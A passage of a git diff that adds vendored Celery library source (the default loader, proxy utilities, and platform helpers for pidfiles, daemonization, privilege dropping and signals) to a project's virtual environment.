'DEFAULT_CONFIG_MODULE') + +DEFAULT_CONFIG_MODULE = 'celeryconfig' + +#: Warns if configuration file is missing if :envvar:`C_WNOCONF` is set. +C_WNOCONF = strtobool(os.environ.get('C_WNOCONF', False)) + + +class Loader(BaseLoader): + """The loader used by the default app.""" + + def setup_settings(self, settingsdict): + return DictAttribute(settingsdict) + + def read_configuration(self, fail_silently=True): + """Read configuration from :file:`celeryconfig.py`.""" + configname = os.environ.get('CELERY_CONFIG_MODULE', + DEFAULT_CONFIG_MODULE) + try: + usercfg = self._import_config_module(configname) + except ImportError: + if not fail_silently: + raise + # billiard sets this if forked using execv + if C_WNOCONF and not os.environ.get('FORKED_BY_MULTIPROCESSING'): + warnings.warn(NotConfigured( + 'No {module} module found! Please make sure it exists and ' + 'is available to Python.'.format(module=configname))) + return self.setup_settings({}) + else: + self.configured = True + return self.setup_settings(usercfg) diff --git a/env/Lib/site-packages/celery/local.py b/env/Lib/site-packages/celery/local.py new file mode 100644 index 00000000..7bbe6151 --- /dev/null +++ b/env/Lib/site-packages/celery/local.py @@ -0,0 +1,543 @@ +"""Proxy/PromiseProxy implementation. + +This module contains critical utilities that needs to be loaded as +soon as possible, and that shall not load any third party modules. + +Parts of this module is Copyright by Werkzeug Team. +""" + +import operator +import sys +from functools import reduce +from importlib import import_module +from types import ModuleType + +__all__ = ('Proxy', 'PromiseProxy', 'try_import', 'maybe_evaluate') + +__module__ = __name__ # used by Proxy class body + + +def _default_cls_attr(name, type_, cls_value): + # Proxy uses properties to forward the standard + # class attributes __module__, __name__ and __doc__ to the real + # object, but these needs to be a string when accessed from + # the Proxy class directly. This is a hack to make that work. + # -- See Issue #1087. + + def __new__(cls, getter): + instance = type_.__new__(cls, cls_value) + instance.__getter = getter + return instance + + def __get__(self, obj, cls=None): + return self.__getter(obj) if obj is not None else self + + return type(name, (type_,), { + '__new__': __new__, '__get__': __get__, + }) + + +def try_import(module, default=None): + """Try to import and return module. + + Returns None if the module does not exist. + """ + try: + return import_module(module) + except ImportError: + return default + + +class Proxy: + """Proxy to another object.""" + + # Code stolen from werkzeug.local.Proxy. + __slots__ = ('__local', '__args', '__kwargs', '__dict__') + + def __init__(self, local, + args=None, kwargs=None, name=None, __doc__=None): + object.__setattr__(self, '_Proxy__local', local) + object.__setattr__(self, '_Proxy__args', args or ()) + object.__setattr__(self, '_Proxy__kwargs', kwargs or {}) + if name is not None: + object.__setattr__(self, '__custom_name__', name) + if __doc__ is not None: + object.__setattr__(self, '__doc__', __doc__) + + @_default_cls_attr('name', str, __name__) + def __name__(self): + try: + return self.__custom_name__ + except AttributeError: + return self._get_current_object().__name__ + + @_default_cls_attr('qualname', str, __name__) + def __qualname__(self): + try: + return self.__custom_name__ + except AttributeError: + return self._get_current_object().__qualname__ + + @_default_cls_attr('module', str, __module__) + def __module__(self): + return self._get_current_object().__module__ + + @_default_cls_attr('doc', str, __doc__) + def __doc__(self): + return self._get_current_object().__doc__ + + def _get_class(self): + return self._get_current_object().__class__ + + @property + def __class__(self): + return self._get_class() + + def _get_current_object(self): + """Get current object. + + This is useful if you want the real + object behind the proxy at a time for performance reasons or because + you want to pass the object into a different context. + """ + loc = object.__getattribute__(self, '_Proxy__local') + if not hasattr(loc, '__release_local__'): + return loc(*self.__args, **self.__kwargs) + try: # pragma: no cover + # not sure what this is about + return getattr(loc, self.__name__) + except AttributeError: # pragma: no cover + raise RuntimeError(f'no object bound to {self.__name__}') + + @property + def __dict__(self): + try: + return self._get_current_object().__dict__ + except RuntimeError: # pragma: no cover + raise AttributeError('__dict__') + + def __repr__(self): + try: + obj = self._get_current_object() + except RuntimeError: # pragma: no cover + return f'<{self.__class__.__name__} unbound>' + return repr(obj) + + def __bool__(self): + try: + return bool(self._get_current_object()) + except RuntimeError: # pragma: no cover + return False + + __nonzero__ = __bool__ # Py2 + + def __dir__(self): + try: + return dir(self._get_current_object()) + except RuntimeError: # pragma: no cover + return [] + + def __getattr__(self, name): + if name == '__members__': + return dir(self._get_current_object()) + return getattr(self._get_current_object(), name) + + def __setitem__(self, key, value): + self._get_current_object()[key] = value + + def __delitem__(self, key): + del self._get_current_object()[key] + + def __setattr__(self, name, value): + setattr(self._get_current_object(), name, value) + + def __delattr__(self, name): + delattr(self._get_current_object(), name) + + def __str__(self): + return str(self._get_current_object()) + + def __lt__(self, other): + return self._get_current_object() < other + + def __le__(self, other): + return self._get_current_object() <= other + + def __eq__(self, other): + return self._get_current_object() == other + + def __ne__(self, other): + return self._get_current_object() != other + + def __gt__(self, other): + return self._get_current_object() > other + + def __ge__(self, other): + return self._get_current_object() >= other + + def __hash__(self): + return hash(self._get_current_object()) + + def __call__(self, *a, **kw): + return self._get_current_object()(*a, **kw) + + def __len__(self): + return len(self._get_current_object()) + + def __getitem__(self, i): + return self._get_current_object()[i] + + def __iter__(self): + return iter(self._get_current_object()) + + def __contains__(self, i): + return i in self._get_current_object() + + def __add__(self, other): + return self._get_current_object() + other + + def __sub__(self, other): + return self._get_current_object() - other + + def __mul__(self, other): + return self._get_current_object() * other + + def __floordiv__(self, other): + return self._get_current_object() // other + + def __mod__(self, other): + return self._get_current_object() % other + + def __divmod__(self, other): + return self._get_current_object().__divmod__(other) + + def __pow__(self, other): + return self._get_current_object() ** other + + def __lshift__(self, other): + return self._get_current_object() << other + + def __rshift__(self, other): + return self._get_current_object() >> other + + def __and__(self, other): + return self._get_current_object() & other + + def __xor__(self, other): + return self._get_current_object() ^ other + + def __or__(self, other): + return self._get_current_object() | other + + def __div__(self, other): + return self._get_current_object().__div__(other) + + def __truediv__(self, other): + return self._get_current_object().__truediv__(other) + + def __neg__(self): + return -(self._get_current_object()) + + def __pos__(self): + return +(self._get_current_object()) + + def __abs__(self): + return abs(self._get_current_object()) + + def __invert__(self): + return ~(self._get_current_object()) + + def __complex__(self): + return complex(self._get_current_object()) + + def __int__(self): + return int(self._get_current_object()) + + def __float__(self): + return float(self._get_current_object()) + + def __oct__(self): + return oct(self._get_current_object()) + + def __hex__(self): + return hex(self._get_current_object()) + + def __index__(self): + return self._get_current_object().__index__() + + def __coerce__(self, other): + return self._get_current_object().__coerce__(other) + + def __enter__(self): + return self._get_current_object().__enter__() + + def __exit__(self, *a, **kw): + return self._get_current_object().__exit__(*a, **kw) + + def __reduce__(self): + return self._get_current_object().__reduce__() + + +class PromiseProxy(Proxy): + """Proxy that evaluates object once. + + :class:`Proxy` will evaluate the object each time, while the + promise will only evaluate it once. + """ + + __slots__ = ('__pending__', '__weakref__') + + def _get_current_object(self): + try: + return object.__getattribute__(self, '__thing') + except AttributeError: + return self.__evaluate__() + + def __then__(self, fun, *args, **kwargs): + if self.__evaluated__(): + return fun(*args, **kwargs) + from collections import deque + try: + pending = object.__getattribute__(self, '__pending__') + except AttributeError: + pending = None + if pending is None: + pending = deque() + object.__setattr__(self, '__pending__', pending) + pending.append((fun, args, kwargs)) + + def __evaluated__(self): + try: + object.__getattribute__(self, '__thing') + except AttributeError: + return False + return True + + def __maybe_evaluate__(self): + return self._get_current_object() + + def __evaluate__(self, + _clean=('_Proxy__local', + '_Proxy__args', + '_Proxy__kwargs')): + try: + thing = Proxy._get_current_object(self) + except Exception: + raise + else: + object.__setattr__(self, '__thing', thing) + for attr in _clean: + try: + object.__delattr__(self, attr) + except AttributeError: # pragma: no cover + # May mask errors so ignore + pass + try: + pending = object.__getattribute__(self, '__pending__') + except AttributeError: + pass + else: + try: + while pending: + fun, args, kwargs = pending.popleft() + fun(*args, **kwargs) + finally: + try: + object.__delattr__(self, '__pending__') + except AttributeError: # pragma: no cover + pass + return thing + + +def maybe_evaluate(obj): + """Attempt to evaluate promise, even if obj is not a promise.""" + try: + return obj.__maybe_evaluate__() + except AttributeError: + return obj + + +# ############# Module Generation ########################## + +# Utilities to dynamically +# recreate modules, either for lazy loading or +# to create old modules at runtime instead of +# having them litter the source tree. + +# import fails in python 2.5. fallback to reduce in stdlib + + +MODULE_DEPRECATED = """ +The module %s is deprecated and will be removed in a future version. +""" + +DEFAULT_ATTRS = {'__file__', '__path__', '__doc__', '__all__'} + + +# im_func is no longer available in Py3. +# instead the unbound method itself can be used. +def fun_of_method(method): + return method + + +def getappattr(path): + """Get attribute from current_app recursively. + + Example: ``getappattr('amqp.get_task_consumer')``. + + """ + from celery import current_app + return current_app._rgetattr(path) + + +COMPAT_MODULES = { + 'celery': { + 'execute': { + 'send_task': 'send_task', + }, + 'log': { + 'get_default_logger': 'log.get_default_logger', + 'setup_logger': 'log.setup_logger', + 'setup_logging_subsystem': 'log.setup_logging_subsystem', + 'redirect_stdouts_to_logger': 'log.redirect_stdouts_to_logger', + }, + 'messaging': { + 'TaskConsumer': 'amqp.TaskConsumer', + 'establish_connection': 'connection', + 'get_consumer_set': 'amqp.TaskConsumer', + }, + 'registry': { + 'tasks': 'tasks', + }, + }, +} + +#: We exclude these from dir(celery) +DEPRECATED_ATTRS = set(COMPAT_MODULES['celery'].keys()) | {'subtask'} + + +class class_property: + + def __init__(self, getter=None, setter=None): + if getter is not None and not isinstance(getter, classmethod): + getter = classmethod(getter) + if setter is not None and not isinstance(setter, classmethod): + setter = classmethod(setter) + self.__get = getter + self.__set = setter + + info = getter.__get__(object) # just need the info attrs. + self.__doc__ = info.__doc__ + self.__name__ = info.__name__ + self.__module__ = info.__module__ + + def __get__(self, obj, type=None): + if obj and type is None: + type = obj.__class__ + return self.__get.__get__(obj, type)() + + def __set__(self, obj, value): + if obj is None: + return self + return self.__set.__get__(obj)(value) + + def setter(self, setter): + return self.__class__(self.__get, setter) + + +def reclassmethod(method): + return classmethod(fun_of_method(method)) + + +class LazyModule(ModuleType): + _compat_modules = () + _all_by_module = {} + _direct = {} + _object_origins = {} + + def __getattr__(self, name): + if name in self._object_origins: + module = __import__(self._object_origins[name], None, None, + [name]) + for item in self._all_by_module[module.__name__]: + setattr(self, item, getattr(module, item)) + return getattr(module, name) + elif name in self._direct: # pragma: no cover + module = __import__(self._direct[name], None, None, [name]) + setattr(self, name, module) + return module + return ModuleType.__getattribute__(self, name) + + def __dir__(self): + return [ + attr for attr in set(self.__all__) | DEFAULT_ATTRS + if attr not in DEPRECATED_ATTRS + ] + + def __reduce__(self): + return import_module, (self.__name__,) + + +def create_module(name, attrs, cls_attrs=None, pkg=None, + base=LazyModule, prepare_attr=None): + fqdn = '.'.join([pkg.__name__, name]) if pkg else name + cls_attrs = {} if cls_attrs is None else cls_attrs + pkg, _, modname = name.rpartition('.') + cls_attrs['__module__'] = pkg + + attrs = { + attr_name: (prepare_attr(attr) if prepare_attr else attr) + for attr_name, attr in attrs.items() + } + module = sys.modules[fqdn] = type( + modname, (base,), cls_attrs)(name) + module.__dict__.update(attrs) + return module + + +def recreate_module(name, compat_modules=None, by_module=None, direct=None, + base=LazyModule, **attrs): + compat_modules = compat_modules or COMPAT_MODULES.get(name, ()) + by_module = by_module or {} + direct = direct or {} + old_module = sys.modules[name] + origins = get_origins(by_module) + + _all = tuple(set(reduce( + operator.add, + [tuple(v) for v in [compat_modules, origins, direct, attrs]], + ))) + cattrs = { + '_compat_modules': compat_modules, + '_all_by_module': by_module, '_direct': direct, + '_object_origins': origins, + '__all__': _all, + } + new_module = create_module(name, attrs, cls_attrs=cattrs, base=base) + new_module.__dict__.update({ + mod: get_compat_module(new_module, mod) for mod in compat_modules + }) + new_module.__spec__ = old_module.__spec__ + return old_module, new_module + + +def get_compat_module(pkg, name): + def prepare(attr): + if isinstance(attr, str): + return Proxy(getappattr, (attr,)) + return attr + + attrs = COMPAT_MODULES[pkg.__name__][name] + if isinstance(attrs, str): + fqdn = '.'.join([pkg.__name__, name]) + module = sys.modules[fqdn] = import_module(attrs) + return module + attrs['__all__'] = list(attrs) + return create_module(name, dict(attrs), pkg=pkg, prepare_attr=prepare) + + +def get_origins(defs): + origins = {} + for module, attrs in defs.items(): + origins.update({attr: module for attr in attrs}) + return origins diff --git a/env/Lib/site-packages/celery/platforms.py b/env/Lib/site-packages/celery/platforms.py new file mode 100644 index 00000000..f424ac37 --- /dev/null +++ b/env/Lib/site-packages/celery/platforms.py @@ -0,0 +1,831 @@ +"""Platforms. + +Utilities dealing with platform specifics: signals, daemonization, +users, groups, and so on. +""" + +import atexit +import errno +import math +import numbers +import os +import platform as _platform +import signal as _signal +import sys +import warnings +from contextlib import contextmanager + +from billiard.compat import close_open_fds, get_fdmax +from billiard.util import set_pdeathsig as _set_pdeathsig +# fileno used to be in this module +from kombu.utils.compat import maybe_fileno +from kombu.utils.encoding import safe_str + +from .exceptions import SecurityError, SecurityWarning, reraise +from .local import try_import + +try: + from billiard.process import current_process +except ImportError: + current_process = None + +_setproctitle = try_import('setproctitle') +resource = try_import('resource') +pwd = try_import('pwd') +grp = try_import('grp') +mputil = try_import('multiprocessing.util') + +__all__ = ( + 'EX_OK', 'EX_FAILURE', 'EX_UNAVAILABLE', 'EX_USAGE', 'SYSTEM', + 'IS_macOS', 'IS_WINDOWS', 'SIGMAP', 'pyimplementation', 'LockFailed', + 'get_fdmax', 'Pidfile', 'create_pidlock', 'close_open_fds', + 'DaemonContext', 'detached', 'parse_uid', 'parse_gid', 'setgroups', + 'initgroups', 'setgid', 'setuid', 'maybe_drop_privileges', 'signals', + 'signal_name', 'set_process_title', 'set_mp_process_title', + 'get_errno_name', 'ignore_errno', 'fd_by_path', +) + +# exitcodes +EX_OK = getattr(os, 'EX_OK', 0) +EX_FAILURE = 1 +EX_UNAVAILABLE = getattr(os, 'EX_UNAVAILABLE', 69) +EX_USAGE = getattr(os, 'EX_USAGE', 64) +EX_CANTCREAT = getattr(os, 'EX_CANTCREAT', 73) + +SYSTEM = _platform.system() +IS_macOS = SYSTEM == 'Darwin' +IS_WINDOWS = SYSTEM == 'Windows' + +DAEMON_WORKDIR = '/' + +PIDFILE_FLAGS = os.O_CREAT | os.O_EXCL | os.O_WRONLY +PIDFILE_MODE = ((os.R_OK | os.W_OK) << 6) | ((os.R_OK) << 3) | (os.R_OK) + +PIDLOCKED = """ERROR: Pidfile ({0}) already exists. +Seems we're already running? (pid: {1})""" + +ROOT_DISALLOWED = """\ +Running a worker with superuser privileges when the +worker accepts messages serialized with pickle is a very bad idea! + +If you really want to continue then you have to set the C_FORCE_ROOT +environment variable (but please think about this before you do). + +User information: uid={uid} euid={euid} gid={gid} egid={egid} +""" + +ROOT_DISCOURAGED = """\ +You're running the worker with superuser privileges: this is +absolutely not recommended! + +Please specify a different user using the --uid option. + +User information: uid={uid} euid={euid} gid={gid} egid={egid} +""" + +ASSUMING_ROOT = """\ +An entry for the specified gid or egid was not found. +We're assuming this is a potential security issue. +""" + +SIGNAMES = { + sig for sig in dir(_signal) + if sig.startswith('SIG') and '_' not in sig +} +SIGMAP = {getattr(_signal, name): name for name in SIGNAMES} + + +def pyimplementation(): + """Return string identifying the current Python implementation.""" + if hasattr(_platform, 'python_implementation'): + return _platform.python_implementation() + elif sys.platform.startswith('java'): + return 'Jython ' + sys.platform + elif hasattr(sys, 'pypy_version_info'): + v = '.'.join(str(p) for p in sys.pypy_version_info[:3]) + if sys.pypy_version_info[3:]: + v += '-' + ''.join(str(p) for p in sys.pypy_version_info[3:]) + return 'PyPy ' + v + else: + return 'CPython' + + +class LockFailed(Exception): + """Raised if a PID lock can't be acquired.""" + + +class Pidfile: + """Pidfile. + + This is the type returned by :func:`create_pidlock`. + + See Also: + Best practice is to not use this directly but rather use + the :func:`create_pidlock` function instead: + more convenient and also removes stale pidfiles (when + the process holding the lock is no longer running). + """ + + #: Path to the pid lock file. + path = None + + def __init__(self, path): + self.path = os.path.abspath(path) + + def acquire(self): + """Acquire lock.""" + try: + self.write_pid() + except OSError as exc: + reraise(LockFailed, LockFailed(str(exc)), sys.exc_info()[2]) + return self + + __enter__ = acquire + + def is_locked(self): + """Return true if the pid lock exists.""" + return os.path.exists(self.path) + + def release(self, *args): + """Release lock.""" + self.remove() + + __exit__ = release + + def read_pid(self): + """Read and return the current pid.""" + with ignore_errno('ENOENT'): + with open(self.path) as fh: + line = fh.readline() + if line.strip() == line: # must contain '\n' + raise ValueError( + f'Partial or invalid pidfile {self.path}') + + try: + return int(line.strip()) + except ValueError: + raise ValueError( + f'pidfile {self.path} contents invalid.') + + def remove(self): + """Remove the lock.""" + with ignore_errno(errno.ENOENT, errno.EACCES): + os.unlink(self.path) + + def remove_if_stale(self): + """Remove the lock if the process isn't running. + + I.e. process does not respond to signal. + """ + try: + pid = self.read_pid() + except ValueError: + print('Broken pidfile found - Removing it.', file=sys.stderr) + self.remove() + return True + if not pid: + self.remove() + return True + + try: + os.kill(pid, 0) + except os.error as exc: + if exc.errno == errno.ESRCH or exc.errno == errno.EPERM: + print('Stale pidfile exists - Removing it.', file=sys.stderr) + self.remove() + return True + except SystemError: + print('Stale pidfile exists - Removing it.', file=sys.stderr) + self.remove() + return True + return False + + def write_pid(self): + pid = os.getpid() + content = f'{pid}\n' + + pidfile_fd = os.open(self.path, PIDFILE_FLAGS, PIDFILE_MODE) + pidfile = os.fdopen(pidfile_fd, 'w') + try: + pidfile.write(content) + # flush and sync so that the re-read below works. + pidfile.flush() + try: + os.fsync(pidfile_fd) + except AttributeError: # pragma: no cover + pass + finally: + pidfile.close() + + rfh = open(self.path) + try: + if rfh.read() != content: + raise LockFailed( + "Inconsistency: Pidfile content doesn't match at re-read") + finally: + rfh.close() + + +PIDFile = Pidfile # XXX compat alias + + +def create_pidlock(pidfile): + """Create and verify pidfile. + + If the pidfile already exists the program exits with an error message, + however if the process it refers to isn't running anymore, the pidfile + is deleted and the program continues. + + This function will automatically install an :mod:`atexit` handler + to release the lock at exit, you can skip this by calling + :func:`_create_pidlock` instead. + + Returns: + Pidfile: used to manage the lock. + + Example: + >>> pidlock = create_pidlock('/var/run/app.pid') + """ + pidlock = _create_pidlock(pidfile) + atexit.register(pidlock.release) + return pidlock + + +def _create_pidlock(pidfile): + pidlock = Pidfile(pidfile) + if pidlock.is_locked() and not pidlock.remove_if_stale(): + print(PIDLOCKED.format(pidfile, pidlock.read_pid()), file=sys.stderr) + raise SystemExit(EX_CANTCREAT) + pidlock.acquire() + return pidlock + + +def fd_by_path(paths): + """Return a list of file descriptors. + + This method returns list of file descriptors corresponding to + file paths passed in paths variable. + + Arguments: + paths: List[str]: List of file paths. + + Returns: + List[int]: List of file descriptors. + + Example: + >>> keep = fd_by_path(['/dev/urandom', '/my/precious/']) + """ + stats = set() + for path in paths: + try: + fd = os.open(path, os.O_RDONLY) + except OSError: + continue + try: + stats.add(os.fstat(fd)[1:3]) + finally: + os.close(fd) + + def fd_in_stats(fd): + try: + return os.fstat(fd)[1:3] in stats + except OSError: + return False + + return [_fd for _fd in range(get_fdmax(2048)) if fd_in_stats(_fd)] + + +class DaemonContext: + """Context manager daemonizing the process.""" + + _is_open = False + + def __init__(self, pidfile=None, workdir=None, umask=None, + fake=False, after_chdir=None, after_forkers=True, + **kwargs): + if isinstance(umask, str): + # octal or decimal, depending on initial zero. + umask = int(umask, 8 if umask.startswith('0') else 10) + self.workdir = workdir or DAEMON_WORKDIR + self.umask = umask + self.fake = fake + self.after_chdir = after_chdir + self.after_forkers = after_forkers + self.stdfds = (sys.stdin, sys.stdout, sys.stderr) + + def redirect_to_null(self, fd): + if fd is not None: + dest = os.open(os.devnull, os.O_RDWR) + os.dup2(dest, fd) + + def open(self): + if not self._is_open: + if not self.fake: + self._detach() + + os.chdir(self.workdir) + if self.umask is not None: + os.umask(self.umask) + + if self.after_chdir: + self.after_chdir() + + if not self.fake: + # We need to keep /dev/urandom from closing because + # shelve needs it, and Beat needs shelve to start. + keep = list(self.stdfds) + fd_by_path(['/dev/urandom']) + close_open_fds(keep) + for fd in self.stdfds: + self.redirect_to_null(maybe_fileno(fd)) + if self.after_forkers and mputil is not None: + mputil._run_after_forkers() + + self._is_open = True + + __enter__ = open + + def close(self, *args): + if self._is_open: + self._is_open = False + + __exit__ = close + + def _detach(self): + if os.fork() == 0: # first child + os.setsid() # create new session + if os.fork() > 0: # pragma: no cover + # second child + os._exit(0) + else: + os._exit(0) + return self + + +def detached(logfile=None, pidfile=None, uid=None, gid=None, umask=0, + workdir=None, fake=False, **opts): + """Detach the current process in the background (daemonize). + + Arguments: + logfile (str): Optional log file. + The ability to write to this file + will be verified before the process is detached. + pidfile (str): Optional pid file. + The pidfile won't be created, + as this is the responsibility of the child. But the process will + exit if the pid lock exists and the pid written is still running. + uid (int, str): Optional user id or user name to change + effective privileges to. + gid (int, str): Optional group id or group name to change + effective privileges to. + umask (str, int): Optional umask that'll be effective in + the child process. + workdir (str): Optional new working directory. + fake (bool): Don't actually detach, intended for debugging purposes. + **opts (Any): Ignored. + + Example: + >>> from celery.platforms import detached, create_pidlock + >>> with detached( + ... logfile='/var/log/app.log', + ... pidfile='/var/run/app.pid', + ... uid='nobody'): + ... # Now in detached child process with effective user set to nobody, + ... # and we know that our logfile can be written to, and that + ... # the pidfile isn't locked. + ... pidlock = create_pidlock('/var/run/app.pid') + ... + ... # Run the program + ... program.run(logfile='/var/log/app.log') + """ + if not resource: + raise RuntimeError('This platform does not support detach.') + workdir = os.getcwd() if workdir is None else workdir + + signals.reset('SIGCLD') # Make sure SIGCLD is using the default handler. + maybe_drop_privileges(uid=uid, gid=gid) + + def after_chdir_do(): + # Since without stderr any errors will be silently suppressed, + # we need to know that we have access to the logfile. + logfile and open(logfile, 'a').close() + # Doesn't actually create the pidfile, but makes sure it's not stale. + if pidfile: + _create_pidlock(pidfile).release() + + return DaemonContext( + umask=umask, workdir=workdir, fake=fake, after_chdir=after_chdir_do, + ) + + +def parse_uid(uid): + """Parse user id. + + Arguments: + uid (str, int): Actual uid, or the username of a user. + Returns: + int: The actual uid. + """ + try: + return int(uid) + except ValueError: + try: + return pwd.getpwnam(uid).pw_uid + except (AttributeError, KeyError): + raise KeyError(f'User does not exist: {uid}') + + +def parse_gid(gid): + """Parse group id. + + Arguments: + gid (str, int): Actual gid, or the name of a group. + Returns: + int: The actual gid of the group. + """ + try: + return int(gid) + except ValueError: + try: + return grp.getgrnam(gid).gr_gid + except (AttributeError, KeyError): + raise KeyError(f'Group does not exist: {gid}') + + +def _setgroups_hack(groups): + # :fun:`setgroups` may have a platform-dependent limit, + # and it's not always possible to know in advance what this limit + # is, so we use this ugly hack stolen from glibc. + groups = groups[:] + + while 1: + try: + return os.setgroups(groups) + except ValueError: # error from Python's check. + if len(groups) <= 1: + raise + groups[:] = groups[:-1] + except OSError as exc: # error from the OS. + if exc.errno != errno.EINVAL or len(groups) <= 1: + raise + groups[:] = groups[:-1] + + +def setgroups(groups): + """Set active groups from a list of group ids.""" + max_groups = None + try: + max_groups = os.sysconf('SC_NGROUPS_MAX') + except Exception: # pylint: disable=broad-except + pass + try: + return _setgroups_hack(groups[:max_groups]) + except OSError as exc: + if exc.errno != errno.EPERM: + raise + if any(group not in groups for group in os.getgroups()): + # we shouldn't be allowed to change to this group. + raise + + +def initgroups(uid, gid): + """Init process group permissions. + + Compat version of :func:`os.initgroups` that was first + added to Python 2.7. + """ + if not pwd: # pragma: no cover + return + username = pwd.getpwuid(uid)[0] + if hasattr(os, 'initgroups'): # Python 2.7+ + return os.initgroups(username, gid) + groups = [gr.gr_gid for gr in grp.getgrall() + if username in gr.gr_mem] + setgroups(groups) + + +def setgid(gid): + """Version of :func:`os.setgid` supporting group names.""" + os.setgid(parse_gid(gid)) + + +def setuid(uid): + """Version of :func:`os.setuid` supporting usernames.""" + os.setuid(parse_uid(uid)) + + +def maybe_drop_privileges(uid=None, gid=None): + """Change process privileges to new user/group. + + If UID and GID is specified, the real user/group is changed. + + If only UID is specified, the real user is changed, and the group is + changed to the users primary group. + + If only GID is specified, only the group is changed. + """ + if sys.platform == 'win32': + return + if os.geteuid(): + # no point trying to setuid unless we're root. + if not os.getuid(): + raise SecurityError('contact support') + uid = uid and parse_uid(uid) + gid = gid and parse_gid(gid) + + if uid: + _setuid(uid, gid) + else: + gid and setgid(gid) + + if uid and not os.getuid() and not os.geteuid(): + raise SecurityError('Still root uid after drop privileges!') + if gid and not os.getgid() and not os.getegid(): + raise SecurityError('Still root gid after drop privileges!') + + +def _setuid(uid, gid): + # If GID isn't defined, get the primary GID of the user. + if not gid and pwd: + gid = pwd.getpwuid(uid).pw_gid + # Must set the GID before initgroups(), as setgid() + # is known to zap the group list on some platforms. + + # setgid must happen before setuid (otherwise the setgid operation + # may fail because of insufficient privileges and possibly stay + # in a privileged group). + setgid(gid) + initgroups(uid, gid) + + # at last: + setuid(uid) + # ... and make sure privileges cannot be restored: + try: + setuid(0) + except OSError as exc: + if exc.errno != errno.EPERM: + raise + # we should get here: cannot restore privileges, + # everything was fine. + else: + raise SecurityError( + 'non-root user able to restore privileges after setuid.') + + +if hasattr(_signal, 'setitimer'): + def _arm_alarm(seconds): + _signal.setitimer(_signal.ITIMER_REAL, seconds) +else: + def _arm_alarm(seconds): + _signal.alarm(math.ceil(seconds)) + + +class Signals: + """Convenience interface to :mod:`signals`. + + If the requested signal isn't supported on the current platform, + the operation will be ignored. + + Example: + >>> from celery.platforms import signals + + >>> from proj.handlers import my_handler + >>> signals['INT'] = my_handler + + >>> signals['INT'] + my_handler + + >>> signals.supported('INT') + True + + >>> signals.signum('INT') + 2 + + >>> signals.ignore('USR1') + >>> signals['USR1'] == signals.ignored + True + + >>> signals.reset('USR1') + >>> signals['USR1'] == signals.default + True + + >>> from proj.handlers import exit_handler, hup_handler + >>> signals.update(INT=exit_handler, + ... TERM=exit_handler, + ... HUP=hup_handler) + """ + + ignored = _signal.SIG_IGN + default = _signal.SIG_DFL + + def arm_alarm(self, seconds): + return _arm_alarm(seconds) + + def reset_alarm(self): + return _signal.alarm(0) + + def supported(self, name): + """Return true value if signal by ``name`` exists on this platform.""" + try: + self.signum(name) + except AttributeError: + return False + else: + return True + + def signum(self, name): + """Get signal number by name.""" + if isinstance(name, numbers.Integral): + return name + if not isinstance(name, str) \ + or not name.isupper(): + raise TypeError('signal name must be uppercase string.') + if not name.startswith('SIG'): + name = 'SIG' + name + return getattr(_signal, name) + + def reset(self, *signal_names): + """Reset signals to the default signal handler. + + Does nothing if the platform has no support for signals, + or the specified signal in particular. + """ + self.update((sig, self.default) for sig in signal_names) + + def ignore(self, *names): + """Ignore signal using :const:`SIG_IGN`. + + Does nothing if the platform has no support for signals, + or the specified signal in particular. + """ + self.update((sig, self.ignored) for sig in names) + + def __getitem__(self, name): + return _signal.getsignal(self.signum(name)) + + def __setitem__(self, name, handler): + """Install signal handler. + + Does nothing if the current platform has no support for signals, + or the specified signal in particular. + """ + try: + _signal.signal(self.signum(name), handler) + except (AttributeError, ValueError): + pass + + def update(self, _d_=None, **sigmap): + """Set signal handlers from a mapping.""" + for name, handler in dict(_d_ or {}, **sigmap).items(): + self[name] = handler + + +signals = Signals() +get_signal = signals.signum # compat +install_signal_handler = signals.__setitem__ # compat +reset_signal = signals.reset # compat +ignore_signal = signals.ignore # compat + + +def signal_name(signum): + """Return name of signal from signal number.""" + return SIGMAP[signum][3:] + + +def strargv(argv): + arg_start = 2 if 'manage' in argv[0] else 1 + if len(argv) > arg_start: + return ' '.join(argv[arg_start:]) + return '' + + +def set_pdeathsig(name): + """Sends signal ``name`` to process when parent process terminates.""" + if signals.supported('SIGKILL'): + try: + _set_pdeathsig(signals.signum('SIGKILL')) + except OSError: + # We ignore when OS does not support set_pdeathsig + pass + + +def set_process_title(progname, info=None): + """Set the :command:`ps` name for the currently running process. + + Only works if :pypi:`setproctitle` is installed. + """ + proctitle = f'[{progname}]' + proctitle = f'{proctitle} {info}' if info else proctitle + if _setproctitle: + _setproctitle.setproctitle(safe_str(proctitle)) + return proctitle + + +if os.environ.get('NOSETPS'): # pragma: no cover + + def set_mp_process_title(*a, **k): + """Disabled feature.""" +else: + + def set_mp_process_title(progname, info=None, hostname=None): + """Set the :command:`ps` name from the current process name. + + Only works if :pypi:`setproctitle` is installed. + """ + if hostname: + progname = f'{progname}: {hostname}' + name = current_process().name if current_process else 'MainProcess' + return set_process_title(f'{progname}:{name}', info=info) + + +def get_errno_name(n): + """Get errno for string (e.g., ``ENOENT``).""" + if isinstance(n, str): + return getattr(errno, n) + return n + + +@contextmanager +def ignore_errno(*errnos, **kwargs): + """Context manager to ignore specific POSIX error codes. + + Takes a list of error codes to ignore: this can be either + the name of the code, or the code integer itself:: + + >>> with ignore_errno('ENOENT'): + ... with open('foo', 'r') as fh: + ... return fh.read() + + >>> with ignore_errno(errno.ENOENT, errno.EPERM): + ... pass + + Arguments: + types (Tuple[Exception]): A tuple of exceptions to ignore + (when the errno matches). Defaults to :exc:`Exception`. + """ + types = kwargs.get('types') or (Exception,) + errnos = [get_errno_name(errno) for errno in errnos] + try: + yield + except types as exc: + if not hasattr(exc, 'errno'): + raise + if exc.errno not in errnos: + raise + + +def check_privileges(accept_content): + if grp is None or pwd is None: + return + pickle_or_serialize = ('pickle' in accept_content + or 'application/group-python-serialize' in accept_content) + + uid = os.getuid() if hasattr(os, 'getuid') else 65535 + gid = os.getgid() if hasattr(os, 'getgid') else 65535 + euid = os.geteuid() if hasattr(os, 'geteuid') else 65535 + egid = os.getegid() if hasattr(os, 'getegid') else 65535 + + if hasattr(os, 'fchown'): + if not all(hasattr(os, attr) + for attr in ('getuid', 'getgid', 'geteuid', 'getegid')): + raise SecurityError('suspicious platform, contact support') + + # Get the group database entry for the current user's group and effective + # group id using grp.getgrgid() method + # We must handle the case where either the gid or the egid are not found. + try: + gid_entry = grp.getgrgid(gid) + egid_entry = grp.getgrgid(egid) + except KeyError: + warnings.warn(SecurityWarning(ASSUMING_ROOT)) + _warn_or_raise_security_error(egid, euid, gid, uid, + pickle_or_serialize) + return + + # Get the group and effective group name based on gid + 